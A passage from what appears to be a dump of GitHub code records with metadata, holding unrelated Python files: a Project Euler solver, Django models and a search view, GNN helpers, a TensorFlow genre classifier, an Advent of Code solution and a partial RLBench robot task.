** n - 1] * l\n    for candidate in candidates:\n        for pattern in patterns:\n            digits = [int(ch) for ch in str(candidate)]\n            pattern_digits = [digits[index] for index in pattern]\n            start_digit = pattern_digits[0]\n            if len(set(pattern_digits)) > 1:\n                # skip if not the same digits in '*' pattern\n                continue\n            if 10 - start_digit < l:\n                # Skip if digits too high for having l primes\n                continue\n            primes_founded = [candidate]\n            for digit in range(start_digit + 1, 10):\n                for index in pattern:\n                    digits[index] = digit\n                next_candidate = functools.reduce(lambda x, y: 10 * x + y, digits)\n                if is_prime(candidates, next_candidate):\n                    primes_founded.append(next_candidate)\n            if len(primes_founded) >= l:\n                return primes_founded\n    return result\n\n\ndef select(primes, n, k):\n    \"\"\"Select primes having n digits and k the same digits.\"\"\"\n    min_prime = 10 ** (n - 1)\n    max_prime = 10 * min_prime\n    start_index = bisect_left(primes, min_prime)\n    end_index = bisect_right(primes, max_prime)\n    if k == 1:\n        candidates = primes[start_index:end_index]\n    else:\n        candidates = []\n        for prime in primes[start_index:end_index]:\n            if prime < min_prime or prime >= max_prime:\n                assert False\n            prime_digits = sorted(str(prime))\n            unique_digits = set(prime_digits)\n            for digit in unique_digits:\n                counter = prime_digits.count(digit)\n                if counter >= k:\n                    candidates.append(prime)\n                    break\n    return candidates\n\n\ndef process(n, k, l):\n    \"\"\"Find the n-digit prime sequence of length l having k of the same digit.\"\"\"\n    primes = eratosthenes_sieve(10 ** n)\n    candidates = select(primes, n, k)\n    patterns = gen_patterns(n, k)\n    if len(candidates) > 0:\n        result = find_sequence(candidates, patterns, n, k, l)\n        if result[0] < 10 ** n - 1:\n            return result\n    return ['Empty!']\n\n\n# for n in range(2, 8):\n#     for k in range(1, n + 1):\n#         for l in range(1, 9):\n#             print(n, k, l)\n#             result = process(n, k, l)\n#             print(*result[:l])\n# exit()\n\nn, k, l = [int(s) for s in input().split()]\nresult = process(n, k, l)\nprint(*result[:l])\n","repo_name":"mqq-marek/ProjectEuler","sub_path":"ProjectEuler/Problems_051_100/P051_PrimeDigitReplacements.py","file_name":"P051_PrimeDigitReplacements.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39775046371","text":"class Person(object):\n    # age is a class attribute\n    age = 1\n\n    def __init__(self, name):\n        # name is an instance attribute\n        self.name = name\n\n\ndef main():\n    # class attribute accessed via the class: ClassName.attribute\n    print(Person.age)\n    xiaoming = Person(\"小明\")\n    # class attribute accessed via an instance: instance.attribute\n    print(xiaoming.age)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"lotapp/BaseCode","sub_path":"python/2.OOP/1Encapsulation/1.6.static_class.py","file_name":"1.6.static_class.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"14796031798","text":"from django.contrib.auth.models import User\nfrom django.db import models\nfrom django.db.models import signals\nfrom django.utils.translation import gettext as _\n\nimport juntagrico\nfrom juntagrico.config import Config\nfrom juntagrico.entity.jobs import Assignment, OneTimeJob, RecuringJob, Job\nfrom juntagrico.entity.member import Member, SubscriptionMembership\nfrom juntagrico.entity.share import Share\nfrom juntagrico.entity.subs import Subscription, SubscriptionPart\nfrom juntagrico.lifecycle.job import job_pre_save, handle_job_canceled, handle_job_time_changed\nfrom juntagrico.lifecycle.member import member_pre_save, member_post_save, 
handle_member_deactivated, \\\n handle_member_created\nfrom juntagrico.lifecycle.share import share_post_save, handle_share_created, share_pre_save\nfrom juntagrico.lifecycle.simplestate import handle_simple_deactivated, handle_simple_activated\nfrom juntagrico.lifecycle.sub import sub_pre_save, handle_sub_canceled, handle_sub_deactivated, handle_sub_activated, \\\n sub_post_save, handle_sub_created\nfrom juntagrico.lifecycle.submembership import sub_membership_pre_save\nfrom juntagrico.lifecycle.subpart import sub_part_pre_save\nfrom juntagrico.util.signals import register_entities_for_post_init_and_save\n\n\nclass SpecialRoles(models.Model):\n '''\n No instances should be created of this class it is just the place to create permissions\n like bookkeeper or operation group\n '''\n\n class Meta:\n permissions = (('is_operations_group', _('Benutzer ist in der BG')),\n ('is_book_keeper', _('Benutzer ist Buchhalter')),\n ('can_send_mails', _('Benutzer kann im System Emails versenden')),\n ('can_use_general_email', _('Benutzer kann General Email Adresse verwenden')),\n ('depot_list_notification',\n _('Benutzer wird bei {0}-Listen-Erstellung informiert').format(Config.vocabulary('depot'))),\n ('can_view_exports', _('Benutzer kann Exporte öffnen')),\n ('can_view_lists', _('Benutzer kann Listen öffnen')),)\n\n\n''' non lifecycle related signals '''\nsignals.pre_save.connect(Member.create, sender=Member)\nsignals.post_delete.connect(Member.post_delete, sender=Member)\nsignals.pre_save.connect(Assignment.pre_save, sender=Assignment)\n''' lifecycle signal handling'''\n''' job signal handling '''\nsignals.pre_save.connect(job_pre_save, sender=OneTimeJob)\nsignals.pre_save.connect(job_pre_save, sender=RecuringJob)\nsignals.pre_save.connect(job_pre_save, sender=Job)\njuntagrico.signals.job_canceled.connect(handle_job_canceled, sender=OneTimeJob)\njuntagrico.signals.job_canceled.connect(handle_job_canceled, sender=RecuringJob)\njuntagrico.signals.job_time_changed.connect(handle_job_time_changed, sender=OneTimeJob)\njuntagrico.signals.job_time_changed.connect(handle_job_time_changed, sender=RecuringJob)\n''' subscription signal handling '''\nsignals.pre_save.connect(sub_pre_save, sender=Subscription)\nsignals.post_save.connect(sub_post_save, sender=Subscription)\njuntagrico.signals.sub_created.connect(handle_sub_created, sender=Subscription)\njuntagrico.signals.sub_activated.connect(handle_sub_activated, sender=Subscription)\njuntagrico.signals.sub_deactivated.connect(handle_sub_deactivated, sender=Subscription)\njuntagrico.signals.sub_canceled.connect(handle_sub_canceled, sender=Subscription)\n''' subscription part handling'''\nsignals.pre_save.connect(sub_part_pre_save, sender=SubscriptionPart)\njuntagrico.signals.extra_sub_activated.connect(handle_simple_activated, sender=SubscriptionPart)\njuntagrico.signals.extra_sub_deactivated.connect(handle_simple_deactivated, sender=SubscriptionPart)\n''' subscription membership handling '''\nsignals.pre_save.connect(sub_membership_pre_save, sender=SubscriptionMembership)\n''' share handling '''\nsignals.pre_save.connect(share_pre_save, sender=Share)\nsignals.post_save.connect(share_post_save, sender=Share)\njuntagrico.signals.share_created.connect(handle_share_created, sender=Share)\n''' member handling '''\nsignals.pre_save.connect(member_pre_save, sender=Member)\nsignals.post_save.connect(member_post_save, sender=Member)\njuntagrico.signals.member_created.connect(handle_member_created, 
sender=Member)\njuntagrico.signals.member_deactivated.connect(handle_member_deactivated, sender=Member)\n''' lifecycle all post init'''\nregister_entities_for_post_init_and_save()\n\n'''monkey patch User email method'''\n\n\ndef member_email(self):\n return self.member.email\n\n\nUser.member__email = property(member_email)\n\nUser.EMAIL_FIELD = 'member__email'\n","repo_name":"juntagrico/juntagrico","sub_path":"juntagrico/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"61"} +{"seq_id":"6162923333","text":"from django.shortcuts import render , redirect\nfrom django.contrib.postgres.search import SearchVector, SearchQuery, SearchRank , TrigramSimilarity\nfrom django.views.generic import (ListView, DetailView, CreateView, UpdateView)\nfrom django.db.models import Q, F, Count, Subquery, Prefetch\nfrom itertools import chain\nfrom .models import SearchTerms\nfrom product.models import Product ,Category\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n\n\nclass SearchView(ListView):\n template_name = 'category.html'\n count = 0\n queryset = Product.objects.none()\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n # context['count'] = context.get('object_list').count()\n query = self.request.GET.get('q')\n show = self.request.GET.get('show')\n cat = self.request.GET.get('list')\n\n search_vectors = (\n SearchVector('title', weight='A') +\n SearchVector('description', weight='B')\n )\n\n search_query = SearchQuery(query)\n search_rank = SearchRank(search_vectors, search_query)\n trigram_similarity = TrigramSimilarity('title', query)\n\n if query:\n self.update_search_query(query) \n products= Product.objects.annotate(search=search_vectors, total_orders = Count('order_products')).filter(Q(search=search_query)).order_by('-total_orders')\n categories = Category.objects.filter(product_subsubcatgeory__in=products)[0:20]\n if cat:\n products= products.filter(Q(sub_subcategory__slug=cat))\n\n paginator = Paginator(products, 40) \n page = self.request.GET.get('page')\n try:\n products = paginator.page(page)\n except PageNotAnInteger:\n products = paginator.page(1)\n except EmptyPage:\n products = paginator.page(paginator.num_pages)\n \n context = {\n 'products': products,\n 'categories':categories,\n }\n\n return context\n\n def update_search_query(self, query):\n term, _ = SearchTerms.objects.get_or_create(\n defaults={'search_terms':query}, \n search_terms__iexact=query\n )\n term.total_searches += 1\n term.save() \n\n\n # def get_queryset(self, *args, **kwargs):\n # query = self.request.GET['q']\n # if not query:\n # return redirect('home')\n # self.update_search_query(query)\n # return Product.objects.filter(Q(title__icontains=query))\n # return super().get_queryset()\n\n \n \n\n\n\n\n\n \n\n","repo_name":"surajbhattrai/Chroma-Django-Ecommerce","sub_path":"search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31442147354","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*-\n# @Time : 2020/8/8 15:14\n# @Author : Raymound luo\n# @Mail : luolinhao1998@gmail.com\n# @File : helper.py\n# @Software: PyCharm\n# @Describe:\nimport torch\nimport os\nimport matplotlib as mpl\n\nmpl.use('Agg')\nfrom matplotlib import pyplot as plt\nfrom .evluator import Evaluator\nimport 
json\nimport numpy as np\nimport matplotlib\n\n\ndef to_device(tensor_list, device):\n return [tensor.to(device) for tensor in tensor_list]\n\n\ndef get_logits(p_emb, contex_emb, pos_g, neg_g):\n pos_edges = pos_g.edges()\n neg_edges = neg_g.edges()\n src = torch.cat([pos_edges[0], neg_edges[0]])\n dst = torch.cat([pos_edges[1], neg_edges[1]])\n labels = torch.cat([torch.ones_like(pos_edges[0]), torch.zeros_like(neg_edges[1])]).float()\n logits = torch.sum((p_emb[src] * contex_emb[src]) * (p_emb[dst] * contex_emb[dst]), dim=1)\n return logits, labels\n\n\ndef load_latest_model(checkpoint_path, model):\n files = os.listdir(checkpoint_path)\n get_time = lambda file: os.path.getmtime(os.path.join(checkpoint_path, file))\n files.sort(key=get_time, reverse=True)\n try:\n latest_model_path = os.path.join(checkpoint_path, files[0])\n except:\n return model\n if os.path.isdir(latest_model_path):\n latest_model_path = os.path.join(latest_model_path, 'model.pth')\n print(\"Load model: \", latest_model_path)\n model.load_state_dict(torch.load(latest_model_path))\n return model\n\n\ndef evaluate(p_emb, CF_data, LP_data, method, metric=['CF', 'LP', 'CL'], save_result=False, result_path='./result',\n random_state=123, max_iter=150,\n n_jobs=1):\n evaluator = Evaluator(method, CF_data, LP_data, result_path, random_state, max_iter, n_jobs)\n if 'CF' in metric:\n evaluator.evluate_CF(p_emb)\n if 'LP' in metric:\n evaluator.evluate_LP(p_emb)\n if 'CL' in metric:\n evaluator.evluate_CL(p_emb)\n if save_result:\n return evaluator.dump_result(p_emb, metric)\n return None\n\n\ndef save_attention_matrix(model, path, K):\n attention_matrix_path = os.path.join(path, 'atten.json')\n loss_weight_softmax = torch.softmax(torch.exp(-model.loss_weight), dim=0).detach().cpu().numpy()\n np.savetxt(os.path.join(path, 'raw_length_attention.txt'), model.loss_weight.detach().cpu().numpy(), fmt='%.03f')\n np.savetxt(os.path.join(path, 'softmax_length_attention.txt'), loss_weight_softmax, fmt='%.03f')\n model.eval()\n with torch.no_grad():\n for k in range(1, K + 2):\n model(k)\n model.dump_cgnn_attention_matrix(attention_matrix_path)\n print(\"Attention matrix saved in {}\".format(attention_matrix_path))\n return attention_matrix_path\n\n\ndef heatmap(data, row_labels, col_labels, ax=None,\n cbar_kw={}, cbarlabel=\"\", **kwargs):\n \"\"\"\n Create a heatmap from a numpy array and two lists of labels.\n\n Parameters\n ----------\n data\n A 2D numpy array of shape (N, M).\n row_labels\n A list or array of length N with the labels for the rows.\n col_labels\n A list or array of length M with the labels for the columns.\n ax\n A `matplotlib.axes.Axes` instance to which the heatmap is plotted. If\n not provided, use current axes or create a new one. Optional.\n cbar_kw\n A dictionary with arguments to `matplotlib.Figure.colorbar`. Optional.\n cbarlabel\n The label for the colorbar. Optional.\n **kwargs\n All other arguments are forwarded to `imshow`.\n \"\"\"\n\n if not ax:\n ax = plt.gca()\n\n # Plot the heatmap\n im = ax.imshow(data, **kwargs)\n\n # Create colorbar\n cbar = ax.figure.colorbar(im, ax=ax, **cbar_kw)\n cbar.ax.set_ylabel(cbarlabel, rotation=-90, va=\"bottom\", fontsize=12)\n\n # We want to show all ticks...\n ax.set_xticks(np.arange(data.shape[1]))\n ax.set_yticks(np.arange(data.shape[0]))\n # ... 
and label them with the respective list entries.\n ax.set_xticklabels(col_labels, fontsize=18)\n ax.set_yticklabels(row_labels, fontsize=18)\n\n # Let the horizontal axes labeling appear on top.\n ax.tick_params(top=True, bottom=False,\n labeltop=True, labelbottom=False)\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels())\n\n # Turn spines off and create white grid.\n for edge, spine in ax.spines.items():\n spine.set_visible(False)\n\n ax.set_xticks(np.arange(data.shape[1] + 1) - .5, minor=True)\n ax.set_yticks(np.arange(data.shape[0] + 1) - .5, minor=True)\n ax.grid(which=\"minor\", color=\"w\", linestyle='-', linewidth=3)\n ax.tick_params(which=\"minor\", bottom=False, left=False)\n\n return im, cbar\n\n\ndef annotate_heatmap(im, data=None, valfmt=\"{x:.2f}\",\n textcolors=[\"black\", \"white\"],\n threshold=None, **textkw):\n \"\"\"\n A function to annotate a heatmap.\n\n Parameters\n ----------\n im\n The AxesImage to be labeled.\n data\n Data used to annotate. If None, the image's data is used. Optional.\n valfmt\n The format of the annotations inside the heatmap. This should either\n use the string format method, e.g. \"$ {x:.2f}\", or be a\n `matplotlib.ticker.Formatter`. Optional.\n textcolors\n A list or array of two color specifications. The first is used for\n values below a threshold, the second for those above. Optional.\n threshold\n Value in data units according to which the colors from textcolors are\n applied. If None (the default) uses the middle of the colormap as\n separation. Optional.\n **kwargs\n All other arguments are forwarded to each call to `text` used to create\n the text labels.\n \"\"\"\n\n if not isinstance(data, (list, np.ndarray)):\n data = im.get_array()\n\n # Normalize the threshold to the images color range.\n if threshold is not None:\n threshold = im.norm(threshold)\n else:\n threshold = im.norm(data.max()) / 2.\n\n # Set default alignment to center, but allow it to be\n # overwritten by textkw.\n kw = dict(horizontalalignment=\"center\",\n verticalalignment=\"center\")\n kw.update(textkw)\n\n # Get the formatter in case a string is supplied\n if isinstance(valfmt, str):\n valfmt = matplotlib.ticker.StrMethodFormatter(valfmt)\n\n # Loop over the data and create a `Text` for each \"pixel\".\n # Change the text's color depending on the data.\n texts = []\n for i in range(data.shape[0]):\n for j in range(data.shape[1]):\n kw.update(color=textcolors[int(im.norm(data[i, j]) > threshold)])\n text = im.axes.text(j, i, \"%.2f\" % data[i, j], **kw)\n texts.append(text)\n\n return texts\n\n\ndef generate_attention_heat_map(node_types, attention_matrix_path):\n with open(attention_matrix_path) as f:\n attention_matrix_dict = json.load(f)\n x_label = node_types\n y_label = node_types\n for hop, hop_attention_matrix in attention_matrix_dict.items():\n data = []\n for x in x_label:\n temp = []\n for y in y_label:\n key = x + y\n value = 0\n for _, head in hop_attention_matrix.items():\n value = value + head.get(key, 0) # Sum the value of each head\n temp.append(value)\n data.append(temp)\n fig, ax = plt.subplots()\n Y_label = [i.upper() for i in y_label]\n X_label = [i.upper() for i in x_label]\n data = np.array(data)\n im, _ = heatmap(data, Y_label, X_label, ax=ax, vmin=0,\n cmap=\"magma_r\",\n cbarlabel=\"Relation Attention Matrix of {} hop Context\".format(hop.split('_')[-1]))\n annotate_heatmap(im, valfmt=\"{x:d}\", size=15, threshold=20,\n textcolors=[\"red\", \"white\"])\n fig.tight_layout()\n figure_path = 
os.path.join(os.path.dirname(attention_matrix_path), \"{}-length.png\".format(hop.split('_')[-1]))\n plt.savefig(figure_path)\n # show\n plt.show()\n\n\ndef save_config(config, path):\n config_path = os.path.join(path, \"config.py\")\n with open(config_path, 'w') as f:\n f.write('data_config =' + str(config.data_config))\n f.write(\"\\n\")\n f.write('model_config =' + str(config.model_config))\n f.write(\"\\n\")\n f.write('train_config =' + str(config.train_config))\n f.write(\"\\n\")\n f.write('evaluate_config =' + str(config.evaluate_config))\n","repo_name":"RManLuo/CP-GNN","sub_path":"utils/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":8501,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"61"} +{"seq_id":"20055016766","text":"#from os import putenv\n#putenv(\"TF_CPP_MIN_LOG_LEVEL\", \"2\")\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras.layers.experimental import preprocessing\nfrom settings import *\nfrom data_processing import *\nfrom models import make_model\nfrom data_reading import read\n\n\nmodel_name = \"conv_zporadnika\"\n\nEPOCHS = 15\n# MODELS = [\"test\", \"recurrent1\", \"recurrent2\", \"convoulutional1\", \"conv_zporadnika\", \"PRCNN\", \"BBNN\", \"BBNN_simplified\"]\n# print('Wybierz model:')\n# for i in range(len(MODELS)):\n# print(f'{i+1}. {MODELS[i]}')\n# model_name = MODELS[int(input())-1]\n\n# split = 80 # % of data used for training (rest for validation)\n\ndataset, _shape = read(model_name, 20)\n#dataset.map(lambda data, label: (spectrogram(data), label)) # Looks like shallow copy issues\ndataset = dataset.shuffle(min(len(dataset), 4000))\nn_split = np.ceil(len(dataset) * 0.7) # 70% for training\ntraining_dset = dataset.take(n_split)\nvalidation_dset = dataset.skip(n_split)\nn_split = np.ceil(len(dataset) * 0.2) # 20% for validation, 10% for testing\ntest_dset = validation_dset.skip(n_split)\nvalidation_dset = validation_dset.take(n_split)\n\ntraining_dset.batch(BATCH_SIZE)\nvalidation_dset.batch(BATCH_SIZE)\ntest_dset.batch(BATCH_SIZE)\n\nlearn = True\nif learn:\n\n initial_learning_rate = 0.01\n lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n initial_learning_rate, decay_steps=20, decay_rate=0.96, staircase=True\n )\n\n checkpoint_cb = tf.keras.callbacks.ModelCheckpoint(\n f\"checkpoints/{model_name}.h5\", save_best_only=True, monitor='val_accuracy'\n )\n\n early_stopping_cb = tf.keras.callbacks.EarlyStopping(\n patience=10, restore_best_weights=True, monitor='val_accuracy'\n )\n\n model = make_model(_shape, model_name)\n\n tf.keras.utils.plot_model(model, model_name+\".png\") # Requires graphviz installed (in system)\n\n model.compile(\n optimizer=tf.keras.optimizers.Adam(learning_rate=lr_schedule),\n loss=tf.keras.losses.CategoricalCrossentropy(from_logits=False),\n metrics=[tf.keras.metrics.CategoricalAccuracy()],\n run_eagerly=True\n )\n\n history = model.fit(\n training_dset,\n epochs=EPOCHS,\n validation_data=validation_dset,\n callbacks=[checkpoint_cb, early_stopping_cb],\n )\n\nelse:\n model = tf.keras.models.load_model(f\"checkpoints/{model_name}.h5\")\n\n\nmodel.evaluate(test_dset, steps=test_dset.__len__().numpy()/10, batch_size=10)\n\nlabels_original = np.concatenate([y for x, y in test_dset], axis=0)\nlabels_numeric = list()\nfor l in labels_original:\n idx = np.where(l == 1)[0][0]\n labels_numeric.append(idx)\n\npredictions = model.predict(np.concatenate([x for x, y in test_dset], axis=0), 
batch_size=BATCH_SIZE)\n\n#predictions = model.apply(np.concatenate([x for x, y in test_dset], axis=0))\n#predictions = model(np.concatenate([x for x, y in test_dset], axis=0))\n#model.evaluate(np.concatenate([x for x, y in test_dset], axis=0), steps=test_dset.__len__().numpy()/10, batch_size=10)\n# model.evaluate(np.concatenate([x for x, y in validation_dset], axis=0), steps=validation_dset.__len__().numpy()/10, batch_size=10)\n\npredictions_numeric = list()\nfor p in predictions:\n idx = np.argmax(p)\n predictions_numeric.append(idx)\ncounter = 0\n\nfor i in range(len(labels_numeric)):\n if labels_numeric[i] == predictions_numeric[i]:\n counter += 1\n\nprint(counter/len(labels_numeric))\n\ncm = tf.math.confusion_matrix(labels_numeric, predictions_numeric)\n\nprint(cm)\nprint(genres)\n\nwith open(f'confusion_matrixes/{model_name}_{counter/len(labels_numeric)}', 'w') as f:\n f.write(str(cm))\n\n# print(tf.keras.metrics.binary_accuracy(labels_numeric, predictions_numeric))\n\ncon = tf.math.confusion_matrix(labels=labels_numeric, predictions=predictions_numeric )\n\n#https://towardsdatascience.com/a-practical-guide-to-tfrecords-584536bc786c\nexit(0)\n","repo_name":"Maciej-R/Music_genre_recognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38535698749","text":"#!/usr/bin/env python\n# vim:set fileencoding=utf8: #\n\n\"\"\"\n +\n nw / \\ ne\n + q r +\n w| |e\n + +\n sw \\ / se\n +\n\ne, se, sw, w, nw, and ne\n\nne: +q, -r\n e: +q\nse: +r\nsw: -q, +r\n w: -q\nnw: -r\n\"\"\"\n\nimport sys\n\npuzzle_input = sys.stdin.read().strip()\n\ntiles = {}\n\ndef get_blacks():\n return [k for k,v in tiles.items() if v == 'black']\n\nfor line in puzzle_input.split('\\n'):\n coordinates = [0, 0]\n # Follow the coordinates to find the tile that gets flipped.\n i = 0\n while i < len(line):\n # First see if the next letter needs to be grabbed as well.\n c = line[i]\n i += 1\n if c in ['n', 's']:\n c += line[i]\n i += 1\n\n if c == 'ne':\n coordinates[0] += 1\n coordinates[1] -= 1\n elif c == 'e':\n coordinates[0] += 1\n elif c == 'se':\n coordinates[1] += 1\n elif c == 'sw':\n coordinates[0] -= 1\n coordinates[1] += 1\n elif c == 'w':\n coordinates[0] -= 1\n elif c == 'nw':\n coordinates[1] -= 1\n\n # At the destination tile. 
See if it's in the tile dictionary already.\n    key = tuple(coordinates)\n    if key not in tiles:\n        tiles[key] = 'black'\n    else:\n        if tiles[key] == 'black':\n            tiles[key] = 'white'\n        else:\n            tiles[key] = 'black'\n\nprint('Part 1 Answer: {}'.format(len(get_blacks())))\n\ndef get_adjacent_colors(q, r):\n    adjacent = []\n    for i,j in [[1, -1], [1, 0], [0,1], [-1, 1], [-1, 0], [0,-1]]:\n        if (q+i, r+j) in tiles:\n            adjacent.append(tiles[q+i, r+j])\n        else:\n            adjacent.append('white')\n\n    return adjacent\n\ndef get_adjacent_whites(q, r):\n    adjacent = []\n    for i,j in [[1, -1], [1, 0], [0,1], [-1, 1], [-1, 0], [0,-1]]:\n        if (q+i, r+j) in tiles:\n            if tiles[q+i, r+j] == 'white':\n                adjacent.append([q+i, r+j])\n        else:\n            adjacent.append([q+i, r+j])\n    return adjacent\n\ndef process_day(day):\n\n    new_tiles = dict(tiles)\n    # Get location of all the black tiles.\n    black_tiles = get_blacks()\n\n    # First process rules for the black tiles.\n    for l in black_tiles:\n        adjacent_colors = get_adjacent_colors(l[0], l[1])\n        num_blacks = len([x for x in adjacent_colors if x == 'black'])\n        if num_blacks == 0 or num_blacks > 2:\n            new_tiles[tuple(l)] = 'white'\n\n        # Get the white tiles adjacent to this black tile.\n        white_tile_locations = get_adjacent_whites(l[0], l[1])\n        for w in white_tile_locations:\n            # For each white tile, see if it has exactly two black adjacent.\n            adjacent_colors = get_adjacent_colors(w[0], w[1])\n            if len([x for x in adjacent_colors if x == 'black']) == 2:\n                new_tiles[tuple(w)] = 'black'\n\n    return new_tiles\n\nfor x in range(100):\n    tiles = process_day(x)\n\nprint('Part 2 Answer: {}'.format(len(get_blacks())))\n","repo_name":"mhaig/adventofcode","sub_path":"2020/day24/day24.py","file_name":"day24.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44418871","text":"from typing import List, Tuple, Union\nimport numpy as np\nfrom pyrep.objects.proximity_sensor import ProximitySensor\nfrom rlbench.const import colors\nfrom rlbench.backend.spawn_boundary import SpawnBoundary\nfrom rlbench.backend.conditions import DetectedCondition, Condition\nfrom pyrep.objects.dummy import Dummy\nfrom pyrep.objects.object import Object\nfrom rlbench.backend.task import Task\nfrom pyrep.objects.shape import Shape\nfrom playsound import playsound\nimport os\n\n\nDESTINATION = \"waypoint1\"\nFULL_COLORS = (\"red\", \"green\", \"blue\", \"yellow\", \"purple\", \"orange\")\nCOLOR_MAPS = {}\nfor color_name, color_rgb in colors:\n    COLOR_MAPS[color_name] = color_rgb\nSOUND_PATH = \"/informatik3/wtm/home/zhao/Codes/material_sounds/\"\n# e.g. 
+ \"/train/ceramic/Clip_1.wav\"\n\nMATERIALS = [\n (\n \"metal\",\n (\"yellow\", \"orange\"),\n (\"hard and cold\", \"rigid, cold, and smooth\"),\n (\"heavy\", \"300g\"),\n ),\n (\n \"glass\",\n (\"red\", \"blue\", \"yellow\", \"green\"),\n (\"hard\", \"hard and smooth\", \"cold and smooth\"),\n (\"a little bit heavy\", \"150g\"),\n ),\n (\n \"ceramic\",\n FULL_COLORS,\n (\"hard\", \"tough\"),\n (\"100g\", \"average weight\", \"not too light nor not too heavy\"),\n ),\n (\"plastic\", FULL_COLORS, (\"hard\", \"soft\"), (\"light\", \"30g\")),\n (\n \"fibre\",\n FULL_COLORS,\n (\"soft\", \"flexible\"),\n (\"lightweight\", \"underweight\", \"10g\"),\n ),\n]\n\n\nshapes = (\"block\", \"cylinder\")\n\n\nclass NotInCondition(Condition):\n def __init__(self, obj: Object, boundary: Shape):\n self.obj = obj\n self.boundary = boundary\n\n def condition_met(self):\n # Only consider x, y (not z)\n N_only_consider = 2\n pos = self.obj.get_position()[:N_only_consider]\n bbox_pos = self.boundary.get_position()[:N_only_consider]\n bbox = self.boundary.get_bounding_box()[: 2 * N_only_consider]\n bbox_min = bbox_pos + bbox[::2]\n bbox_max = bbox_pos + bbox[1::2]\n met = np.any(pos < bbox_min) or np.any(pos > bbox_max)\n return met, False\n\n\nclass ReverseDetectedCondition(DetectedCondition):\n def condition_met(self):\n met, _ = super().condition_met()\n return not met, False\n\n\nclass ExtendedShape(Shape):\n def __init__(self, name_or_handle: Union[str, int]):\n super().__init__(name_or_handle)\n self._color_name = None\n self._material_name = None\n self._material_sound = None\n\n def set_color_name(self, color_name):\n self._color_name = color_name\n\n def get_color_name(self):\n return self._color_name\n\n def set_material_name(self, material_name):\n self._material_name = material_name\n\n def get_material_name(self):\n return self._material_name\n\n def set_material_sound(self, material_sound):\n self._material_sound = material_sound\n\n def get_material_sound(self):\n return self._material_sound\n\n def set_touch_data(self, touch_data):\n self._touch_data = touch_data\n\n def get_touch_data(self):\n return self._touch_data\n\n def set_weight(self, weight):\n self._weight = weight\n\n def get_weight(self):\n return self._weight\n\n\nclass Knocking(Task):\n def init_task(self) -> None:\n self._mode = \"train\"\n self._random = True\n self._records = []\n\n self.r_palm = Shape(\"r_palm\")\n self.r_Tbumper = Shape(\"r_Tbumper_respondable\")\n self.r_Ibumper = Shape(\"r_Ibumper_respondable\")\n self.r_Mbumper = Shape(\"r_Mbumper_respondable\")\n self.r_Rbumper = Shape(\"r_Rbumper_respondable\")\n self.r_Lbumper = Shape(\"r_Lbumper_respondable\")\n self.Container = Shape(\"Container\")\n\n self.target = ExtendedShape(\"Target\")\n self.distractors = [ExtendedShape(f\"Distractor{i}\") for i in range(2)]\n self.objs = [*self.distractors, self.target]\n self.register_graspable_objects(self.objs)\n self.frame = 0\n self.last_play_frame = 0\n\n # to normalize action\n # self.boundary = BoundaryObject(Shape('Boundary'))\n\n success_sensor = ProximitySensor(\"success\")\n self.register_success_conditions(\n [DetectedCondition(self.target, success_sensor)]\n )\n self.boundary = Shape(\"Boundary\")\n self.register_fail_conditions(\n [\n NotInCondition(self.target, self.boundary),\n ReverseDetectedCondition(self.target, success_sensor),\n ]\n )\n\n def init_episode(self, index: int) -> List[str]:\n def set_material_color_touch(\n obj: ExtendedShape,\n sample_color_name,\n sample_touch_data,\n sample_weight,\n 
material_name,\n log=True,\n ):\n sample_color_rgb = COLOR_MAPS[sample_color_name]\n material_sound_dir = SOUND_PATH + f\"{material_name}/{self._mode}\"\n if os.path.exists(material_sound_dir):\n material_sounds = [\n f for f in os.listdir(material_sound_dir) if f.endswith(\".wav\")\n ]\n\n material_sound = (\n material_sound_dir + \"/\" + np.random.choice(material_sounds)\n )\n else:\n material_sound = \"None\"\n obj.set_color(sample_color_rgb)\n obj.set_color_name(sample_color_name)\n obj.set_material_name(material_name)\n obj.set_material_sound(material_sound)\n obj.set_touch_data(sample_touch_data)\n obj.set_weight(sample_weight)\n log and print(\n f\"{obj.get_name()}: {sample_color_name}, {sample_touch_data}, {sample_weight}, {material_name} ({material_sound}).\"\n )\n return\n\n def sample_material_color(\n obj: ExtendedShape, material_index, sample_color_index=None, log=True\n ):\n (\n material_name,\n material_colors,\n material_touchs,\n material_weights,\n ) = MATERIALS[material_index]\n if sample_color_index is None:\n sample_color_index = np.random.choice(len(material_colors))\n sample_touch_index = np.random.choice(len(material_touchs))\n sample_weight_index = np.random.choice(len(material_weights))\n sample_color_name = material_colors[sample_color_index]\n sample_touch_data = material_touchs[sample_touch_index]\n sample_weight = material_weights[sample_weight_index]\n set_material_color_touch(\n obj,\n sample_color_name,\n sample_touch_data,\n sample_weight,\n material_name,\n log,\n )\n\n if self.random:\n sample_material_color(self.target, index)\n # It is OK to use the same color but different material\n distractor_material_indices = np.random.choice(\n list(range(index)) + list(range(index + 1, len(MATERIALS))),\n size=len(self.distractors),\n replace=True,\n )\n for distractor, distractor_material_index in zip(\n self.distractors, distractor_material_indices\n ):\n sample_material_color(distractor, distractor_material_index)\n\n b 